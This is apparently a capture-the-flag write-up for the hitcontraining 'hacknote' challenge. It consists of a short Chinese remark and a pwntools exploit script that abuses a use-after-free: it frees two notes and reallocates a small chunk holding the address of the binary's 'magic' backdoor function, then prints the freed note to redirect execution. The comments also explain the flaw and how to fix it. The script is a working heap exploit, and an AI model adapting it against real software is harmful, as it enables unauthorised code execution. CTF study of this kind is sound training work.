hitcontraining


    比较简单，直接留了后门！exp

    # Writeup exploit script for the hitcontraining "hacknote" challenge.
    # It drives the binary's numbered menu through a pwntools tube; the
    # writeup's premise is that the binary exports a backdoor function
    # named `magic`, whose address is read from the ELF below.
    from pwn import *
    context.log_level = 'debug'


    def pause_debug():
        """Log the target's pid and block until a key is pressed.

        Intended for attaching a debugger by hand. Defined but never
        called anywhere in this script.
        """
        log.info(proc.pidof(p))
        pause()


    def add_note(size, context):
        """Menu option 1: request a note of `size` bytes and send `context` as its body.

        The parameter name shadows pwntools' module-level `context`; that is
        harmless here because this body never touches the global, but it is
        easy to misread.
        """
        p.sendlineafter('choice :', str(1))
        p.sendlineafter('size :', str(size))
        p.sendafter('Content :', context)


    def delete_note(idx):
        """Menu option 2: delete the note at index `idx`."""
        p.sendlineafter('choice :', str(2))
        p.sendlineafter('Index :', str(idx))


    def print_note(idx):
        """Menu option 3: print the note at index `idx`."""
        p.sendlineafter('choice :', str(3))
        p.sendlineafter('Index :', str(idx))


    proc_name = './hacknote'
    p = process(proc_name)
    # p = remote('node3.buuoj.cn', 27556)
    elf = ELF(proc_name)
    magic_addr = elf.sym['magic']  # backdoor symbol address, taken from the ELF symbol table

    # Interaction sequence exactly as the author wrote it; the trailing
    # index comments are the author's. Note that index 0 is deleted and
    # then printed again: the program's weakness, as this script relies on
    # it, is that a deleted slot stays usable (use-after-free). The fix on
    # the program side is to clear the slot on delete and reject indices
    # that are out of range or already cleared.
    add_note(0x16, b'a')  # 0
    add_note(0x16, b'a')  # 1
    delete_note(0)
    delete_note(1)
    # The author's "2 0" annotation indicates note 2's content is expected to
    # land where note 0's bookkeeping lived — an allocator/binary property
    # this script assumes rather than checks.
    add_note(0x8, p32(magic_addr))  # 2 0
    print_note(0)
    p.interactive()
